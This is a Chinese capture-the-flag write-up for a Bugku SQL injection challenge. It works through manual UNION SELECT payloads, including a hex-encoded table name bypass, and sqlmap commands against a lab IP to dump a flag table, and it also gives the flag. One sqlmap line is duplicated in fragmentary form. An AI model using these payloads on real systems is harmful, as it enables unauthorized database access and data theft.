bugku–成绩查询(字符型)
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
题目地址:bugku–成绩查询
解题思路一:暴力破解数据库名、表名、字段名
参考:成绩查询WP
本题为sql注入题
先测试:输入1,2,3分别能查到1,2,3号学生的成绩;输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常(所以可以断定sql语句的形式是id = ‘input_id’。常用的闭合方式还用id = “input_id”,id = (“input_id”),id = (‘input_id’)等等),看来过滤了–+
查看列数:观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列
接下来就开始暴库名、表名、字段名
尝试联合查询,记得把前面的查询数据置空,写成id=-1即可,显示正常,说明确确实实存在这四列数据
我们先手遍历一遍 id=-1’ union select 1,2,3,4#
发现有四个表且都有回显,于是 就开始爆破吧
首先爆库名:通过id=-1’ union select 1,2,3,database()#得到数据库名字skctf_flag
然后爆表:通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc
接下来暴字段:通过id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要用16进制(将表名fl4g转换为16进制)绕过
得到字段skctf_flag
最后就是查询数据了:通过使用:id=-1’ union select 1,2,3,skctf_flag from fl4g#
至此就拿到flag
解题思路二:采用sqlmap工具
前面得测试分析与解题思路一 一样
注意要加上 --data=“id=1”
1.查询当前使用的数据库名
python sqlmap.py -u “http://114.67.175.224:16004/” --data=“id=1” --current-db
得到:skctf
2.查询当前数据库下的表名
python sqlmap.py -u “http://114.67.175.224:16004/” --data=“id=1” -D skctf --tables
得到:fl4g、sc
3.列出表 fl4g 的所有字段名
python sqlmap.py -u “http://114.67.175.224:16004/” --data=“id=1” -D skctf -T fl4g --columns
得到:skctf_flag (varchar(64))
4.列出该字段内容,即为flag
python sqlmap.py -u “http://114.67.175.224:16004/” --data=“id=1” -D skctf -T fl4g -C skctf_flag --dump
4:16004/" --data=“id=1” -D skctf -T fl4g -C skctf_flag --dump
得到:flag{7d84dd07643e71c2b87aecde68fa2b63}